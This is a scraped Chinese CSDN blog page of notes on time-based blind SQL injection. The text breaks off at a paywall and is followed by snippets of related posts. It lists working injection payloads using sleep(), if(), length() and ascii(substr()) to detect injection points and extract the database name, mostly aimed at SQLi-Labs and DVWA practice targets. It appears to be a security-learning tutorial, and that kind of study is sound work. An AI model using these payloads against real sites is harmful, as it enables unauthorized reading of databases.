sql注入时间盲注笔记

最新推荐文章于 2024-06-03 07:48:05 发布
最新推荐文章于 2024-06-03 07:48:05 发布
阅读量447 收藏
点赞数
分类专栏: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Long_gone/article/details/103618700
版权

1.判断是否存在注入,注入是字符型还是数字型

输入1’ and sleep(5) #,感觉到明显延迟;
输入1 and sleep(5) #,没有延迟;
说明存在字符型的基于时间的盲注

2.猜解当前数据库名

首先猜解数据名的长度。
1’ and if(length(database())=1,sleep(5),1) # 没有延迟
1’ and if(length(database())=2,sleep(5),1) # 没有延迟
1’ and if(length(database())=3,sleep(5),1) # 没有延迟
1’ and if(length(database())=4,sleep(5),1) # 明显延迟
说明数据库名长度为4个字符。接着采用二分法猜解数据库名
1’ and if(ascii(substr(database(),1,1))>97,sleep(5),1)# 明显延迟

1’ and if(ascii(substr(database(),1,1))<100,sleep(5),1)# 没有延迟
1’ and if(ascii(substr(database(),1,1))>100,sleep(5),1)# 没有延迟
说明数据库名的第一个字符为小写字母d

重复上述步骤,即可猜解出数据库名。

3.猜解数据库中的表名

首先猜解数据库中表的数量。
1’ and if((select count(table_name) from inf

最低0.47元/天 解锁文章
Long_gone
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MySQL盲注:基于时间延迟注入(Sleep函数)
m0_51428325的博客
11-16 6141
这里靶场我们还是以“SQLi-Labs”为实战来讲解吧! 一、判断注入点 常用的判断语句: ' and if(1=0,1, sleep(10)) --+ " and if(1=0,1, sleep(10)) --+ ) and if(1=0,1, sleep(10)) --+ ') and if(1=0,1, sleep(10)) --+ ") and if(1=0,1, sleep(10)) --+ 注入示例: http://127.0.0.1/sqli-labs/Less-
SQL盲注(DVWA)
qq_45070118的博客
08-06 5324
SQL盲注,目标只会回复是或不是,没有详细内容 一.基于布尔值的盲注 初级low 如图说明成功 1 and 1=2,返回成功,说明没有执行后面语句,不是数字型 1’or’1’='1 说明成功 1’ and ‘1’ =‘1 成功 1’ and ‘1’ ='2 失败 说该SQL注入为字符型 2.猜解数据库长度 1’ and length(database())=1 # 1’ and le...
mysql 查询睡眠5秒
全村的希望的博客
05-15 1043
单位是秒 select sleep(5)
SQL注入-时间盲注
最新发布
WolvenSec的博客
06-03 1693
SQL时间盲注(Time-based Blind SQL Injection),又叫延时注入,是一种SQL注入攻击技术,用于在无法直接获取查询结果或查看响应内容变化的情况下,通过引入时间延迟来推断数据库的信息;时间盲注依赖于数据库执行查询时的时间延迟,通过观察响应时间的变化,攻击者可以推测出查询结果。这里以Sqli-Labs靶场的Less-9关卡为例子来阐述时间盲注的具体思路:进入关卡首先构建参数id。
SQL注入
qq_46219965的博客
08-29 762
SQL注入步骤 注入手法:联合查询,报错注入,布尔盲注,延时注入
MySQL延时盲注
一个普普通通的博客
03-01 1452
Mysql延时盲注
sql注入时间盲注
笔墨稠思
11-13 2721
什么是盲注? 所谓盲注,就是在服务器没有错误回显的时候完成注入攻击 什么是延时盲注? 通过web页面返回数据的时间差来判断注入语句是否正确 实现布尔盲注需要利用一下几个函数 length() 返回字符串长度 substr() 截取字符串 ascii() 返回字符的ascii码 sleep() 将程序挂起一段时间 if(exp1,exp2,exp3) 判断语句,第一个语句正确就执行第二个,否则执行第三个 靶场实战 首先判断是否存在注入
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
SQL注入基础知识点 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过构造特定的SQL语句来获取敏感信息或控制数据库。下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造...
《SQL手工注入笔记
12-17
这篇笔记可能详尽地介绍了SQL注入的基本原理、常见手法以及防御策略。以下是基于这个主题的一些关键知识点: 1. **SQL注入简介**:SQL注入是一种常见的Web应用安全漏洞,攻击者通过输入特定的SQL代码,使应用程序...
sql手注笔记.docx
12-30
SQL注入是一种常见的网络安全漏洞,它发生在应用程序接收用户输入并直接构造SQL查询时,攻击者可以通过注入恶意SQL代码来获取敏感信息、操纵数据库或完全控制数据库系统。以下是对文档中提到的各种SQL注入技术的详细...
CTF用的各种脚本,各类古典加解密的脚本,RSA常用脚本,SQL盲注脚本,编码加解密神器
12-29
在CTF比赛中,参赛者需要掌握如何识别SQL注入点,使用时间延迟或布尔盲注等技术来探测数据库结构和数据,进而可能获取到“flag”。 4. **编码与解密神器**:这些工具通常包括各种编码解码库和实用程序,如Base64、...
SQL注入基础(报错注入及延时注入)
weixin_41489908的博客
11-17 584
​没有人不辛苦,只是有人不喊疼。。。 ---- 网易云热评 环境:sqli 一、报错注入 1、判断是否存在报错 http://192.168.77.128/sqli/Less-2/?id=1' 2、group by 虚拟表主键重复冲突 查看数据库版本号 http://192.168.77.128/sqli/Less-2/?id=1 and (select 1 from (select count(*),concat(0x23,(select version()),0x23...
sql注入学习分享
这个时代,作为程序员可能要学习小程序
09-25 363
点击上方关注 “终端研发部”设为“星标”,和你一起掌握更多数据库知识WEB框架web应用一改我们平时常见的 p2p 和 C/S 模式,采用 B/S 模式。随着网络技术的发展,特别随着Web技术的不断成熟,B/S 这种软件体系结构出现了。浏览器-服务器(Browser/Server)结构,简称 B/S 结构,与 C/S不同,其客户端不需要安装专门的软件,只需要浏览器即可,浏览器与Web服务器交互,W...
sql学习4(时间注入)
cyy001128的博客
04-05 638
id=1’ and if(ascii(substr((select database()),1,1))>100,1,sleep(5))–+ //如果数据库名字的第一个字符的acsii值小于100,则进行延时。id=1%20and%20if(substring(database(),1,1)=%27a%27,sleep(5),sleep(1))观察请求的时间,大概在5秒以上,说明构造的sleep(5) 语句起作用,可以把这个时间线作为sql 注入的判断依据。步骤同上,得到表名flag。
SQl注入学习
weixin_42451330的博客
06-08 940
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节,像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节。
SQL注入时间延迟型注入
DM766924的博客
09-16 1516
时间延迟型注入 原理:利用if函数,执行判断; 如果正确,直接返回(时间很短,网速有一定影响) 如果不正确,执行时间延迟,常用的函数有sleep和benchmark 以上操作也可以反过来。适用环境:界面无法用布尔真假判断,也无法报错注入的情况下。 时间延迟注入常用SQL函数介绍 if(condition,expr1,expr2)功能:如果condition是true,则if()的返回值是expr1,否则返回值则为expr2,if()的返回值为数字值或字符串,具体情况视其所在语境而定举例:select
sql注入时间盲注sleep被过滤
07-27
对于防止SQL注入中的时间盲注攻击,你可以采取以下一些措施来增强安全性: 1. 使用参数化查询或预编译语句:这是最有效的防止SQL注入攻击的方法之一。通过使用参数化查询或预编译语句,数据库会将输入的值视为数据而不是代码,从而防止恶意代码注入。 2. 输入验证和过滤:在接受用户输入之前,进行输入验证和过滤是非常重要的。确保只接受预期的输入,并拒绝任何非法字符或字符串。 3. 最小权限原则:确保数据库用户拥有最小的权限,以防止攻击者获取敏感数据或执行危险操作。 4. 日志记录和监控:实施严格的日志记录和监控机制,以便在发生异常情况时及时发现并采取相应的措施。 5. 使用防火墙和安全软件:使用防火墙和安全软件来检测和阻止潜在的SQL注入攻击。 6. 定期更新和维护:保持数据库系统和应用程序的最新版本,并及时应用安全补丁。 这些措施可以帮助你提高系统的安全性,但请记住,安全是一个连续的过程,需要不断地审查和改进。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值